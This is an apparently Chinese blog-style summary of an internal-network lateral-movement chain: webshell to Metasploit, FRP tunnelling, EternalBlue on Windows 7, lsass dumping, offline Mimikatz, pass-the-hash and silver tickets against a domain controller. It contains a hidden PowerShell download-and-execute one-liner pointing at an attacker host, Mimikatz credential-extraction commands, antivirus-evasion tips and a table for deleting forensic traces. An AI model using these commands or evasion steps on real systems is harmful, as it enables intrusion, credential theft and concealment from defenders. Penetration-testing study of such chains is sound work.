内网横向移动全套实操重点知识总结

一、整体攻击链路

蚁剑Webshell → MSF反弹会话 → FRP反向隧道打通内网 → MS17-010永恒之蓝拿下内网Win7(SYSTEM权限)→ Procdump导出lsass内存dump → 本地Mimikatz提取账号Hash → PTH/PTT白银票据拿下域控DC 核心逻辑:Web服务器双网卡作为跳板,FRP隧道解决攻击机无法直连内网网段问题

二、无文件反弹(蚁剑→MSF,规避exe查杀)

  1. 载荷格式

    • psh-reflection:PowerShell反射载荷,纯文本无PE头,内存执行不落地

    • 64位目标必须匹配载荷:windows/x64/meterpreter/reverse_tcp

  2. 执行命令核心参数

    复制代码
    powershell -nop -w hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://攻击机IP:端口/payload.ps1')"
    • -nop:跳过配置文件;-w hidden:隐藏黑窗口

    • -exec bypass:绕过系统PowerShell执行策略限制

    • IEX+DownloadString:内存下载执行,不写入磁盘

  3. 配套环境 Kali开启Python简易HTTP服务分发脚本:python3 -m http.server 8080

三、FRP反向隧道(内网互通核心)

1. 作用

攻击机无法访问内网3.0网段,Web跳板双网卡可通内外网;Web主动连接Kali FRP服务端,在Kali本地开放SOCKS5代理,所有扫描/攻击流量走隧道中转。

2. 部署流程

  1. Kali启动frps服务端,监听绑定端口7000

  2. Web服务器上传frpc客户端+配置,后台持续运行建立隧道

  3. Kali配置proxychains4代理127.0.0.1:1080

  4. 扫描、MSF、impacket工具全部加proxychains前缀走代理

3. 两种载荷选择(内网攻击区分)

  • 内网靶机可直连攻击机:reverse_tcp反向载荷

  • 内网隔离无法外联:bind_tcp绑定端口载荷(攻击机通过隧道主动连接)

四、MS17-010永恒之蓝利用要点

  1. 前置条件:目标445端口开放、未打MS17-010补丁(Win7经典漏洞)

  2. 扫描工具:proxychains + nmap/msf smb_ms17_010扫描模块

  3. 利用配置:匹配系统架构x64载荷,开启自动校验系统与架构

  4. 权限收益:成功直接获取NT AUTHORITY\SYSTEM最高权限

五、凭据抓取(Procdump + 本地Mimikatz,规避杀软)

1. 方案优势

不在目标运行Mimikatz(极易被杀),仅导出lsass内存dump文件,回传到攻击机本地解析,痕迹少、拦截概率低。

2. 操作步骤

  1. Meterpreter查询lsass.exe PID

  2. 两种dump方式:

    • 工具:procdump64.exe -ma完整导出内存

    • 系统原生:rundll32 comsvcs.dll MiniDump无第三方工具

  3. dump文件下载至Kali后,目标机器立即删除文件清理痕迹

3. Mimikatz解析关键命令

复制代码
sekurlsa::minidump lsass.dmp   # 加载内存转储文件
sekurlsa::logonpasswords       # 提取明文密码、LM/NTLM Hash
  • 64位dump必须使用64位Mimikatz,否则读取不出凭据

  • 核心产出:域SID、管理员NTLM Hash、krbtgt账号Hash

六、域控渗透两种核心手段

1. Pass-The-Hash(PTH 哈希传递,推荐)

使用impacket工具套件,通过FRP代理直接携带NTLM Hash登录DC,无需票据:

2. Silver Ticket白银票据(PTT票据注入)

  1. 生成票据:使用域管理员Hash伪造指定服务(CIFS文件共享)票据

  2. 上传票据至靶机,Mimikatz执行kerberos::ptt注入内存

  3. 验证:klist查看票据,直接访问DC共享目录

  4. 对比黄金票据:白银票据仅针对单一服务,隐蔽性更强,但无法全域通用

七、无痕化核心规范

操作 是否落地文件 清理方式
PowerShell反弹 否(内存执行) 无痕迹
FRP客户端 临时文件 渗透结束删除exe
lsass dump 短期落地 下载后立刻删除
Mimikatz/票据 临时上传 注入完成马上删除

八、高频故障排查核心点

  1. FRP不通:检查Kali防火墙放行绑定端口、跳板能否ping通攻击机

  2. 永恒之蓝失败:确认445开放、无补丁、载荷架构匹配

  3. dump无数据:必须SYSTEM权限、procdump与系统位数一致、dump文件完整(几百MB)

  4. PTT无法访问DC:域名/SID/Hash复制无误、klist验证票据存在

  5. MSF反弹失效:端口/IP与载荷完全一致、防火墙放行、架构匹配

相关推荐
乌萨奇也要立志学C++11 小时前
【Linux】网络基础 从零理解网络通信:局域网、跨网传输与 Socket 预备知识
linux·服务器·网络
网络研究院12 小时前
Cloudflare 推出 Precursor 行为监测系统,全会话追踪技术引爆 AI 机器人防御战与隐私新争议
网络·人工智能·机器人·系统·cloudflare·反爬虫
Bruce_Liuxiaowei14 小时前
轻量级 IOC 管理方案:Streamlit 驱动的恶意IP情报平台
网络·jvm·网络协议·tcp/ip·安全
数字新视界15 小时前
用电安全管理系统解决方案
物联网·安全·电力监控系统·用电安全·大榕树
9稳15 小时前
基于组态的双向人行道交通灯控制系统设计
开发语言·网络·数据库·labview·plc
2601_9657984715 小时前
Is Hygia Good for Maid & Janitorial Sites? Technical Audit
服务器·网络·数据库
蚰蜒螟15 小时前
从内核源码看Linux启动:chroot、execve与MS_MOVE的协奏曲
linux·服务器·网络
数据知道17 小时前
容器安全入门:Docker 逃逸原理与 5 个经典 CVE
安全·网络安全·docker·容器